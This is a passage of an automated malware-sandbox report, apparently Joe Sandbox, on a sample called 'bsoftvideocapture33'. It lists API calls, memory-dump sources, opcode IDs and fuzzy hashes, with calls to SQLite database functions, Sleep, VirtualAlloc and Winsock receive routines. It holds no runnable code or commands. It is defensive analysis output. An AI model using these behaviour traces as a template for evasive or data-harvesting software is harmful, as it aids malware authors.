• Instruction Fuzzy Hash: 6BB00235C04418DBCB661B909F046A87A71AB08305F1200A5D296750608B350B69AE5E

APIs
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 61b88586a1918d7d60107e7eb9ce3ad16c8b06ab40d01054ffd68403e146a7bd
• Instruction ID: 6cb6adae6e4dae387a6a68d861111d6e9fcc768d2f9bb0382d04ed7505f7e105
• Opcode Fuzzy Hash: 61b88586a1918d7d60107e7eb9ce3ad16c8b06ab40d01054ffd68403e146a7bd
• Instruction Fuzzy Hash: 3EA002E4608103FFF6101FA15E58E6A669C591CBD5329483E6947F00A4DA3C804FB53F

APIs
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 590101ebec6884a0ee9acb2973829ab2a3c525f84439f3422b32393d86e70515
• Instruction ID: fa591de2837cbe488cb39c7422687169b7d8a4828dc75018a60cd497aa2dadd4
• Opcode Fuzzy Hash: 590101ebec6884a0ee9acb2973829ab2a3c525f84439f3422b32393d86e70515
• Instruction Fuzzy Hash: 91900220204101DBE2040A325E0825626546614745B15493D5443E0560DE3580056929
APIs
• GetStartupInfoA.KERNEL32(0040BC80), ref: 0040D15C
• Sleep.KERNELBASE(000007D0), ref: 0040D857
Memory Dump Source
• Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: InfoSleepStartup
• String ID:
• API String ID: 3346105675-0
APIs
• Sleep.KERNELBASE(000003E8), ref: 004018BA
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
• VirtualAlloc.KERNELBASE(00000000), ref: 0040DCDA
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: lstrcmpi
• String ID:
• API String ID: 1586166983-0
APIs
• sqlite3_malloc.SQLITE3 ref: 609674C6
  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_step.SQLITE3 ref: 6096755A
• sqlite3_malloc.SQLITE3 ref: 6096783A
• sqlite3_bind_int64.SQLITE3 ref: 609678A8
• sqlite3_column_bytes.SQLITE3 ref: 609678E8
• sqlite3_column_blob.SQLITE3 ref: 60967901
• sqlite3_column_int64.SQLITE3 ref: 6096791A
• sqlite3_column_int64.SQLITE3 ref: 60967931
• sqlite3_column_int64.SQLITE3 ref: 60967950
• sqlite3_step.SQLITE3 ref: 609679C3
• sqlite3_bind_int64.SQLITE3 ref: 60967AA9
• sqlite3_step.SQLITE3 ref: 60967AB4
• sqlite3_column_int.SQLITE3 ref: 60967AC7
• sqlite3_reset.SQLITE3 ref: 60967AD4
• sqlite3_bind_int.SQLITE3 ref: 60967B89
• sqlite3_step.SQLITE3 ref: 60967B94
• sqlite3_column_int64.SQLITE3 ref: 60967BB0
• sqlite3_column_int64.SQLITE3 ref: 60967BCF
• sqlite3_column_int64.SQLITE3 ref: 60967BE6
• sqlite3_column_bytes.SQLITE3 ref: 60967C05
• sqlite3_column_blob.SQLITE3 ref: 60967C1E
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
• sqlite3_bind_int64.SQLITE3 ref: 60967C72
• sqlite3_step.SQLITE3 ref: 60967C7D
• memcmp.MSVCRT ref: 60967D4C
• sqlite3_free.SQLITE3 ref: 60967D69
• sqlite3_free.SQLITE3 ref: 60967D74
• sqlite3_free.SQLITE3 ref: 60967FF7
• sqlite3_free.SQLITE3 ref: 60968002
  • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
  • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
  • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
  • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
  • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
• sqlite3_reset.SQLITE3 ref: 60967C93
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
• sqlite3_reset.SQLITE3 ref: 60967CA7
• sqlite3_reset.SQLITE3 ref: 60968035
• sqlite3_bind_int64.SQLITE3 ref: 60967B72
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_bind_int64.SQLITE3 ref: 6096809D
• sqlite3_bind_int64.SQLITE3 ref: 609680C6
• sqlite3_step.SQLITE3 ref: 609680D1
• sqlite3_column_int.SQLITE3 ref: 609680F3
• sqlite3_reset.SQLITE3 ref: 60968104
• sqlite3_step.SQLITE3 ref: 60968139
• sqlite3_column_int64.SQLITE3 ref: 60968151
• sqlite3_reset.SQLITE3 ref: 6096818A
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
  • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
• sqlite3_reset.SQLITE3 ref: 609679E9
  • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
• sqlite3_column_bytes.SQLITE3 ref: 60967587
  • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
• sqlite3_column_blob.SQLITE3 ref: 60967572
  • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
• sqlite3_reset.SQLITE3 ref: 609675B7
• sqlite3_bind_int.SQLITE3 ref: 60967641
• sqlite3_step.SQLITE3 ref: 6096764C
• sqlite3_column_int64.SQLITE3 ref: 6096766E
• sqlite3_reset.SQLITE3 ref: 6096768B
• sqlite3_bind_int.SQLITE3 ref: 6096754F
  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
• sqlite3_bind_int.SQLITE3 ref: 609690B2
• sqlite3_bind_blob.SQLITE3 ref: 609690DB
• sqlite3_step.SQLITE3 ref: 609690E6
• sqlite3_reset.SQLITE3 ref: 609690F1
• sqlite3_free.SQLITE3 ref: 60969102
• sqlite3_free.SQLITE3 ref: 6096910D
Strings
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
• String ID: $d
• API String ID: 2451604321-2084297493
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 60966183
                                                                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                                                                        • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                                                                        • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                                                                        • memcmp.MSVCRT ref: 6096639E
                                                                                                                                          • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                                                                          • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                                                                        • String ID: ASC$DESC$x
                                                                                                                                        • API String ID: 4082667235-1162196452
                                                                                                                                        • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                                                        • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                                                                        • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                                                                        • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                                                                        • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                                                          • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                                                                        • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                                                                        • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                                                                        • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                                                                          • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 961572588-0
                                                                                                                                        • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                                                        • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                                                                        • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                                                        • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                                                                        • String ID: 2$foreign key$indexed
                                                                                                                                        • API String ID: 4126863092-702264400
                                                                                                                                        • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                                                        • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                                                                        • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                                                        • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_stricmp
                                                                                                                                        • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                                                                        • API String ID: 912767213-1308749736
                                                                                                                                        • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                                                        • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                                                                        • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                                                        • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                                                                        • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4082478743-0
                                                                                                                                        • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                                                        • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                                                                        • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                                                        • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C08ADE: __EH_prolog.LIBCMT ref: 02C08AE3
                                                                                                                                          • Part of subcall function 02C08ADE: _Allocate.LIBCPMT ref: 02C08B3A
                                                                                                                                          • Part of subcall function 02C08ADE: _memmove.LIBCMT ref: 02C08B91
                                                                                                                                        • _memset.LIBCMT ref: 02C0F949
                                                                                                                                        • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C0F9B2
                                                                                                                                        • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C0F9BA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                                                                        • String ID: Unknown error$invalid string position
                                                                                                                                        • API String ID: 1854462395-1837348584
                                                                                                                                        • Opcode ID: 33104b9dc6c31c4b7b6f6936c97a3f2a51693e6f3afcf76f7defabedfd7cedce
                                                                                                                                        • Instruction ID: da31562bfe1119e62d8f7ebac1cf7e2c139fc07ed6f8236c01b4137680ad8ab4
                                                                                                                                        • Opcode Fuzzy Hash: 33104b9dc6c31c4b7b6f6936c97a3f2a51693e6f3afcf76f7defabedfd7cedce
                                                                                                                                        • Instruction Fuzzy Hash: 1851CF706483419FE724CF25C890B2EBBE4AB88344F50492DE482976E1DB71E588CB96
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 6094D354
• sqlite3_mutex_leave.SQLITE3 ref: 6094D546
  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
  • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
• sqlite3_stricmp.SQLITE3 ref: 6094D3DA
Strings
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
• String ID: BINARY$INTEGER
• API String ID: 317512412-1676293250
APIs
• WSASetLastError.WS2_32(00000000), ref: 02C02BE4
• WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02C02C07
  • Part of subcall function 02C0950E: WSAGetLastError.WS2_32(00000000,?,?,02C02A51), ref: 02C0951C
• WSASetLastError.WS2_32 ref: 02C02CD3
• select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C02CE7
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Recvselect
• String ID: 3'
• API String ID: 886190287-280543908
APIs
• sqlite3_mutex_enter.SQLITE3 ref: 6093F443
  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
• sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
  • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
  • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
• sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
• sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
• String ID:
• API String ID: 4038589952-0
APIs
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_bind_int.SQLITE3 ref: 6096A3DE
  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
• sqlite3_column_int.SQLITE3 ref: 6096A3F3
• sqlite3_step.SQLITE3 ref: 6096A435
• sqlite3_reset.SQLITE3 ref: 6096A445
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
• String ID:
• API String ID: 247099642-0
APIs
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_bind_int64.SQLITE3 ref: 6096A322
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_step.SQLITE3 ref: 6096A32D
• sqlite3_column_int.SQLITE3 ref: 6096A347
  • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
• sqlite3_reset.SQLITE3 ref: 6096A354
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
Joe Sandbox IDA Plugin
